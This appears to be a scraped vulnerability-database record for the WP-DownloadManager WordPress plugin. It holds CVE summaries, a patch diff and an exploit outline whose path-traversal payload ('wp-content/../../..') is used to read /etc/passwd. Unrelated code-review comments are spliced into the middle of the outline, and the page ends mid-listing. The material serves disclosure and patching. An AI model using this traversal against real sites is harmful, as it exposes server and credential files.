functionality.","\u002F\u002F download-options.php\n\n$download_path = ! empty( $_POST['download_path'] ) ? sanitize_text_field( $_POST['download_path'] ) : '';\n\n\u002F\u002F ... 
\n\n\u002F\u002F Line 65: Insufficient validation only checks if path starts with WP_CONTENT_DIR\n\u002F\u002F It does not account for traversal sequences like '..\u002F' following the prefix\nif ( substr( $download_path, 0, strlen( WP_CONTENT_DIR ) ) !== WP_CONTENT_DIR ) {\n    $download_path = WP_CONTENT_DIR;\n}\n\n\u002F\u002F ... \n\nupdate_option('download_path', $download_path);","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-manager.php\t2024-08-19 13:32:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-manager.php\t2026-02-13 01:54:04.000000000 +0000\n@@ -139,16 +139,21 @@\n \t\t\t\t\t\t\tif( $file_upload_to !== '\u002F' ) {\n \t\t\t\t\t\t\t\t$file_upload_to = $file_upload_to . '\u002F';\n \t\t\t\t\t\t\t}\n-\t\t\t\t\t\t\tif(move_uploaded_file($_FILES['file_upload']['tmp_name'], $file_path.$file_upload_to.basename($_FILES['file_upload']['name']))) {\n-\t\t\t\t\t\t\t\t$file = $file_upload_to.basename($_FILES['file_upload']['name']);\n-\t\t\t\t\t\t\t\t$file = download_rename_file($file_path, $file);\n-\t\t\t\t\t\t\t\t$file_size = filesize($file_path.$file);\n+\t\t\t\t\t\t\t$validate = wp_check_filetype_and_ext( $_FILES['file_upload']['tmp_name'], basename( $_FILES['file_upload']['name'] ) );\n+\t\t\t\t\t\t\tif ( $validate['type'] === false ) {\n+\t\t\t\t\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . __('File type is invalid', 'wp-downloadmanager') . 
'\u003C\u002Fp>';\n+\t\t\t\t\t\t\t\t\tbreak;\n+\t\t\t\t\t\t\t}\n+\t\t\t\t\t\t\tif( move_uploaded_file( $_FILES['file_upload']['tmp_name'], $file_path.$file_upload_to . basename( $_FILES['file_upload']['name'] ) ) ) {\n+\t\t\t\t\t\t\t\t$file = $file_upload_to . basename( $_FILES['file_upload']['name'] );\n+\t\t\t\t\t\t\t\t$file = download_rename_file( $file_path, $file );\n+\t\t\t\t\t\t\t\t$file_size = filesize( $file_path . $file );\n \t\t\t\t\t\t\t} else {\n-\t\t\t\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">'.__('Error In Uploading File', 'wp-downloadmanager').'\u003C\u002Fp>';\n+\t\t\t\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . __('Error In Uploading File', 'wp-downloadmanager') . '\u003C\u002Fp>';\n \t\t\t\t\t\t\t\tbreak;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t} else {\n-\t\t\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">'.__('Error In Uploading File', 'wp-downloadmanager').'\u003C\u002Fp>';\n+\t\t\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . __('Error In Uploading File', 'wp-downloadmanager') . '\u003C\u002Fp>';\n \t\t\t\t\t\t\tbreak;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n@@ -208,21 +213,20 @@\n \t\tcase __('Delete File', 'wp-downloadmanager');\n \t\t\tcheck_admin_referer('wp-downloadmanager_delete-file');\n \t\t\t$file_id  = ! empty( $_POST['file_id'] ) ? intval( $_POST['file_id'] ) : 0;\n-\t\t\t$file = ! empty( $_POST['file'] ) ? sanitize_text_field( $_POST['file'] ) : '';\n-\t\t\t$file_name = ! empty( $_POST['file_name'] ) ? sanitize_text_field( $_POST['file_name'] ) : '';\n+\t\t\t$file = $wpdb->get_row( $wpdb->prepare( \"SELECT * FROM $wpdb->downloads WHERE file_id = %d\", $file_id ) );\n \t\t\t$unlinkfile = ! empty( $_POST['unlinkfile'] ) ? 
intval( $_POST['unlinkfile'] ) : 0;\n-\t\t\tif($unlinkfile == 1) {\n-\t\t\t\tif(!unlink($file_path.$file)) {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\tif ( $unlinkfile === 1 ) {\n+\t\t\t\tif ( ! unlink( $file_path . $file->file ) ) {\n+\t\t\t\t\t$text = '\u003Cp style=\"color: red;\">' . sprintf( __( 'Error In Deleting File \\'%s (%s)\\' From Server', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '\u003C\u002Fp>';\n \t\t\t\t} else {\n-\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t\t$text = '\u003Cp style=\"color: green;\">' . sprintf( __( 'File \\'%s (%s)\\' Deleted From Server Successfully', 'wp-downloadmanager' ), $file->file_name, $file->file ) . '\u003C\u002Fp>';\n \t\t\t\t}\n \t\t\t}\n-\t\t\t$deletefile = $wpdb->query(\"DELETE FROM $wpdb->downloads WHERE file_id = $file_id\");\n-\t\t\tif(!$deletefile) {\n-\t\t\t\t$text .= '\u003Cp style=\"color: red;\">'.sprintf(__('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t$deletefile = $wpdb->query( $wpdb->prepare( \"DELETE FROM $wpdb->downloads WHERE file_id = %d\", $file->file_id ) );\n+\t\t\tif ( ! $deletefile ) {\n+\t\t\t\t$text .= '\u003Cp style=\"color: red;\">' . sprintf( __('Error In Deleting File \\'%s (%s)\\'', 'wp-downloadmanager'), $file->file_name, $file->file) . '\u003C\u002Fp>';\n \t\t\t} else {\n-\t\t\t\t$text .= '\u003Cp style=\"color: green;\">'.sprintf(__('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file_name, $file).'\u003C\u002Fp>';\n+\t\t\t\t$text .= '\u003Cp style=\"color: green;\">' . sprintf( __('File \\'%s (%s)\\' Deleted Successfully', 'wp-downloadmanager'), $file->file_name, $file->file) . 
'\u003C\u002Fp>';\n \t\t\t}\n \t\t\tbreak;\n \t}\n@@ -376,9 +380,7 @@\n \t\t\u003C?php if(!empty($text)) { echo '\u003C!-- Last Action -->\u003Cdiv id=\"message\" class=\"updated fade\">\u003Cp>'.stripslashes($text).'\u003C\u002Fp>\u003C\u002Fdiv>'; } ?>\n \t\t\u003C!-- Delete A File -->\n \t\t\u003Cform method=\"post\" action=\"\u003C?php echo admin_url('admin.php?page='.plugin_basename(__FILE__)); ?>\">\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo intval($file->file_id); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file ) ); ?>\" \u002F>\n-\t\t\t\u003Cinput type=\"hidden\" name=\"file_name\" value=\"\u003C?php echo esc_attr( removeslashes( $file->file_name ) ); ?>\" \u002F>\n+\t\t\t\u003Cinput type=\"hidden\" name=\"file_id\" value=\"\u003C?php echo esc_attr( intval( $file->file_id ) ); ?>\" \u002F>\n \t\t\t\u003C?php wp_nonce_field('wp-downloadmanager_delete-file'); ?>\n \t\t\t\u003Cdiv class=\"wrap\">\n \t\t\t\t\u003Ch2>\u003C?php _e('Delete A File', 'wp-downloadmanager'); ?>\u003C\u002Fh2>\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-options.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-options.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69\u002Fdownload-options.php\t2025-05-16 01:50:28.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-downloadmanager\u002F1.69.1\u002Fdownload-options.php\t2026-02-13 01:54:04.000000000 +0000\n@@ -39,7 +39,10 @@\n     $download_options = array('use_filename' => $download_options_use_filename, 'rss_sortby' => $download_options_rss_sortby, 'rss_limit' => $download_options_rss_limit);\n     \n     \u002F\u002F Validate\n-    if ( substr( 
$download_path, 0, strlen( WP_CONTENT_DIR ) ) !== WP_CONTENT_DIR ) {\n+    $real_download_path = realpath( $download_path );\n+    $real_wp_content_dir = realpath( WP_CONTENT_DIR );\n+\n+    if ( false === $real_download_path || false === $real_wp_content_dir || strpos( $real_download_path . DIRECTORY_SEPARATOR, $real_wp_content_dir ) !== 0 || strpos( $download_path, '..\u002F' ) !== false ) {\n         $download_path = WP_CONTENT_DIR;\n     }","1. Authenticate to the WordPress admin dashboard as an Administrator (or a user with the 'manage_downloads' capability).\n2. Navigate to the plugin's 'Download Options' page to obtain a valid nonce for the 'wp-downloadmanager_options' action.\n3. Send a POST request to 'wp-admin\u002Fadmin.php?page=wp-downloadmanager\u002Fdownload-options.php' to update the 'download_path' setting. The payload should include the required WP_CONTENT_DIR prefix followed by enough '..\u002F' sequences to reach the server's root directory (e.g., '\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002F..\u002F..\u002F..\u002F..\u002F').\n4. Navigate to the 'Add File' page and register a new download. Set the 'File Type' to 'Local File' and provide the relative path to a sensitive file (e.g., 'etc\u002Fpasswd' if the download path was set to '\u002F').\n5. 
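Review bot: in the upload hunk of download-manager.php, only `$validate['type'] === false` is tested. The `ext` and `proper_filename` values returned by `wp_check_filetype_and_ext()` are ignored, and `move_uploaded_file()` still writes to the client-supplied `basename( $_FILES['file_upload']['name'] )`. Reject the upload when `ext` is false as well, and use `proper_filename` when it is set. The added `$text` assignment and `break` are also indented one tab deeper than the rest of the block.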
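Review bot: in the Delete File hunk of download-manager.php, the row returned by `$wpdb->get_row()` is used without a null check. A `file_id` that matches no record leaves `$file` null, yet `unlink( $file_path . $file->file )` is still reached when `unlinkfile` is 1. Bail out with an error when `$file` is empty. The stored `file` column is also trusted as is; confirming that the resolved path stays under the download path before `unlink()` would cover a record that already holds a traversal value.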
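Review bot: in the download-options.php validation hunk, the prefix test appends `DIRECTORY_SEPARATOR` to the candidate but not to the base. A canonical path in a sibling directory whose name merely begins with the wp-content string therefore still matches at position 0 and is accepted; compare against `$real_wp_content_dir . DIRECTORY_SEPARATOR` instead. The fallback to `WP_CONTENT_DIR` also fires for any directory that does not exist yet, because `realpath()` returns false, and the literal `../` test does not cover backslash separators. Both cases deserve a comment or a test, and assigning `$real_download_path` back to `$download_path` would keep non-canonical forms out of the setting.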
Identify the newly created file's ID (dl_id) and access the frontend download endpoint (e.g., '\u002F?dl_id=[ID]') to receive the content of the traversed file.","2026-04-19 06:00:54","2026-04-19 06:01:20",{"id":86,"url_slug":87,"title":88,"description":89,"plugin_slug":4,"theme_slug":39,"affected_versions":90,"patched_in_version":91,"severity":92,"cvss_score":93,"cvss_vector":94,"vuln_type":95,"published_date":96,"updated_date":97,"references":98,"days_to_patch":48,"patch_diff_files":100,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-10747","wp-downloadmanager-authenticated-admin-arbitrary-file-upload","WP-DownloadManager \u003C= 1.68.11 - Authenticated (Admin+) Arbitrary File Upload","The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the download-add.php file in all versions up to, and including, 1.68.11. 
This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","\u003C=1.68.11","1.69","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2025-09-25 00:00:00","2025-09-26 05:27:21",[99],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2c535cea-dad6-440f-b37f-6d196b469214?source=api-prod",[],{"id":102,"url_slug":103,"title":104,"description":105,"plugin_slug":4,"theme_slug":39,"affected_versions":106,"patched_in_version":107,"severity":41,"cvss_score":108,"cvss_vector":109,"vuln_type":110,"published_date":111,"updated_date":112,"references":113,"days_to_patch":48,"patch_diff_files":115,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-4798","wp-downloadmanager-authenticated-administrator-arbitrary-file-read","WP-DownloadManager \u003C= 1.68.10 - Authenticated (Administrator+) Arbitrary File Read","The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 1.68.10. This is due to a lack of restriction on the directory an administrator can select for storing downloads. 
This makes it possible for authenticated attackers, with Administrator-level access and above, to download and read any file on the server, including system and configuration files.","\u003C=1.68.10","1.68.11",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2025-06-10 15:30:37","2025-06-11 03:41:52",[114],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6cd166bc-774e-4083-b5f7-bffba1f7c293?source=api-prod",[],{"id":117,"url_slug":118,"title":119,"description":120,"plugin_slug":4,"theme_slug":39,"affected_versions":106,"patched_in_version":107,"severity":92,"cvss_score":93,"cvss_vector":94,"vuln_type":121,"published_date":122,"updated_date":123,"references":124,"days_to_patch":48,"patch_diff_files":126,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-4799","wp-downloadmanager-authenticated-administrator-arbitrary-file-deletion","WP-DownloadManager \u003C= 1.68.10 - Authenticated (Administrator+) Arbitrary File Deletion","The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file deletion due to lack of restriction on the directory a file can be deleted from in all versions up to, and including, 1.68.10. 
This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). This vulnerability can be paired with CVE-2025-4798 to delete any file within the WordPress root directory.","Absolute Path Traversal","2025-06-10 00:00:00","2025-06-11 03:41:53",[125],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff9d9e485-171f-4e36-943d-397d540e31f4?source=api-prod",[],{"id":128,"url_slug":129,"title":130,"description":131,"plugin_slug":4,"theme_slug":39,"affected_versions":132,"patched_in_version":133,"severity":41,"cvss_score":134,"cvss_vector":135,"vuln_type":136,"published_date":137,"updated_date":138,"references":139,"days_to_patch":141,"patch_diff_files":142,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2024-47341","wp-downloadmanager-reflected-cross-site-scripting","WP-DownloadManager \u003C= 1.68.8 - Reflected Cross-Site Scripting","The WP-DownloadManager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.68.8 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","\u003C=1.68.8","1.68.9",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2024-09-27 00:00:00","2024-10-03 13:22:33",[140],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1ef82f14-f6e3-4e9a-9656-d2d15fbfefb8?source=api-prod",7,[],{"id":144,"url_slug":145,"title":146,"description":147,"plugin_slug":4,"theme_slug":39,"affected_versions":148,"patched_in_version":149,"severity":41,"cvss_score":150,"cvss_vector":151,"vuln_type":136,"published_date":152,"updated_date":153,"references":154,"days_to_patch":156,"patch_diff_files":157,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2022-25605","wp-downloadmanager-plugin-stored-cross-site-scripting","WP-DownloadManager plugin \u003C= 1.68.6 -  Stored Cross-Site Scripting","Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions \u003C= 1.68.6). 
Vulnerable parameters &download_path, &download_path_url, &download_page_url.","\u003C1.68.7","1.68.7",4.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","2022-01-12 13:42:00","2024-01-22 19:56:02",[155],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbede3241-6383-4bdb-ac28-cd9781b608d1?source=api-prod",740,[],{"id":159,"url_slug":160,"title":161,"description":162,"plugin_slug":4,"theme_slug":39,"affected_versions":148,"patched_in_version":149,"severity":41,"cvss_score":150,"cvss_vector":151,"vuln_type":136,"published_date":163,"updated_date":153,"references":164,"days_to_patch":166,"patch_diff_files":167,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2022-25606","wp-downloadmanager-stored-cross-site-scripting","WP-DownloadManager \u003C= 1.68.6 - Stored Cross-Site Scripting","Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions \u003C= 1.68.6). 
Vulnerable parameters &download_path, &download_path_url, &download_page_url, &download_categories.","2022-01-10 13:42:00",[165],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff15d39ba-9211-4d35-8252-20d53c6bc249?source=api-prod",742,[],{"id":169,"url_slug":170,"title":171,"description":172,"plugin_slug":4,"theme_slug":39,"affected_versions":173,"patched_in_version":149,"severity":41,"cvss_score":150,"cvss_vector":151,"vuln_type":136,"published_date":174,"updated_date":153,"references":175,"days_to_patch":177,"patch_diff_files":178,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2021-44760","wp-downloadmanager-plugin-reflected-cross-site-scripting","WP-DownloadManager plugin \u003C= 1.68.6 - Reflected Cross-Site Scripting","Authenticated Reflected Cross-Site Scripting (XSS) vulnerability discovered in WP-DownloadManager WordPress plugin (versions \u003C= 1.68.6).","\u003C=1.68.6","2021-12-28 
08:23:00",[176],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa27da737-d925-471f-b0e0-25bc27a95714?source=api-prod",755,[],{"id":180,"url_slug":181,"title":182,"description":183,"plugin_slug":4,"theme_slug":39,"affected_versions":184,"patched_in_version":185,"severity":41,"cvss_score":186,"cvss_vector":187,"vuln_type":188,"published_date":189,"updated_date":153,"references":190,"days_to_patch":192,"patch_diff_files":193,"patch_trac_url":39,"research_status":39,"research_verified":55,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":55,"poc_model_used":39,"poc_verification_depth":39},"CVE-2020-24141","wp-downloadmanager-server-side-request-forgery","WP-DownloadManager \u003C= 1.68.4 - Server-Side Request Forgery","Server-side request forgery in the WP-DownloadManager plugin 1.68.4 for WordPress lets an attacker send crafted requests from the back-end server of a vulnerable web application via the file_remote parameter to download-add.php. 
It can help identify open ports, local network hosts and execute command on services","\u003C1.68.5","1.68.5",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Server-Side Request Forgery (SSRF)","2021-04-13 00:00:00",[191],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbfe48948-7fc9-4806-b1b5-9fac5a6c7d96?source=api-prod",1015,[],{"slug":195,"display_name":7,"profile_url":8,"plugin_count":196,"total_installs":197,"avg_security_score":198,"avg_patch_time_days":199,"trust_score":200,"computed_at":201},"gamerz",20,888090,88,1377,71,"2026-05-20T06:56:43.884Z",[203,225,243,261,279],{"slug":204,"name":205,"version":206,"author":207,"author_profile":208,"description":209,"short_description":210,"active_installs":211,"downloaded":212,"rating":213,"num_ratings":214,"last_updated":215,"tested_up_to":216,"requires_at_least":17,"requires_php":18,"tags":217,"homepage":220,"download_link":221,"security_score":222,"vuln_count":223,"unpatched_count":48,"last_vuln_date":224,"fetched_at":31},"m1downloadlist","m1.DownloadList","0.24","maennchen1.de","https:\u002F\u002Fprofiles.wordpress.org\u002Fmaennchen1de\u002F","\u003Cp>This plugin easily displays the folders and files from a selected directory. It can be placed by shortcode with the parameters path and target in any post. Uploads must be done by a separate ftp program. 
No managing options.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>compatible up to PHP 8.3.20\u003C\u002Fli>\n\u003Cli>need PHP extension \u003Ca href=\"http:\u002F\u002Fphp.net\u002Fmb_string\" rel=\"nofollow ugc\">mb_string\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>available optional shortcode parameters\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>path = directory path, starting by web root (default: wp-content\u002Fuploads\u002F)\u003C\u002Fli>\n\u003Cli>target = browser window name\u003C\u002Fli>\n\u003Cli>sort = by name ASC\u002FDESC (default: ASC)\u003C\u002Fli>\n\u003Cli>sort-order = filename\u002Ffiletype\u002Fftime\u002Ffiletime\u002Ffoldertime (default: filename)\u003C\u002Fli>\n\u003Cli>label = custom top level label\u003C\u002Fli>\n\u003Cli>nosize = displays no file size\u003C\u002Fli>\n\u003Cli>hidedirs = displays no folders, only files\u003C\u002Fli>\n\u003Cli>filetype = (comma separated list) filter files by their extension\u003C\u002Fli>\n\u003Cli>hidefiletype = (comma separated list) hide files with filetype\u003C\u002Fli>\n\u003Cli>hidefilename = (comma separated list) hide named files and folders\u003C\u002Fli>\n\u003Cli>noext = hide the file extensions\u003C\u002Fli>\n\u003Cli>nobreadcrumb = hide breadcrumb \u002F title\u003C\u002Fli>\n\u003Cli>ftime = display file and folder modification date and time (standard = “1” or use date formatting like “Y-m-d H:i”), see \u003Ca href=\"http:\u002F\u002Fphp.net\u002Fdate\" rel=\"nofollow ugc\">PHP date formatting\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>filetime = same as ftime, just for files\u003C\u002Fli>\n\u003Cli>foldertime = same as ftime, just for folders\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>(most of it can be combined together)\u003C\u002Fp>\n\u003Ch4>shortcode examples\u003C\u002Fh4>\n\u003Col>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>: \u003Ccode>[m1dll]\u003C\u002Fcode> \u003C\u002Fli>\n\u003Cli>displays content of 
\u003Ccode>your\u002Ffoldername\u002Fhere\u002F\u003C\u002Fcode>: \u003Ccode>[m1dll path=\"your\u002Ffoldername\u002Fhere\u002F\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>your\u002Ffoldername\u002Fhere\u002F\u003C\u002Fcode> and sort descending: \u003Ccode>[m1dll path=\"your\u002Ffoldername\u002Fhere\u002F\" sort=\"DESC\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>your\u002Ffoldername\u002Fhere\u002F\u003C\u002Fcode>, open files in a new window: \u003Ccode>[m1dll path=\"your\u002Ffoldername\u002Fhere\u002F\" target=\"_blank\"]\u003C\u002Fcode> \u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>your\u002Ffoldername\u002Fhere\u002F\u003C\u002Fcode>, change label ‘downloads’ to ‘our downloads’: \u003Ccode>[m1dll path=\"your\u002Ffoldername\u002Fhere\u002F\" label=\"our downloads\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, displays no file size: \u003Ccode>[m1dll nosize=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, displays no folders: \u003Ccode>[m1dll hidedirs=\"1\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, displays only pdf- and docx-documents: \u003Ccode>[m1dll filetype=\"pdf,docx\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, do not display pdf- and docx-documents: \u003Ccode>[m1dll hidefiletype=\"pdf,docx\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, do not display file secret.txt and secret.docx: \u003Ccode>[m1dll hidefilename=\"secret.txt,secret.docx\"]\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>displays content of \u003Ccode>wp-content\u002Fuploads\u002F\u003C\u002Fcode>, displays no file extensions: 
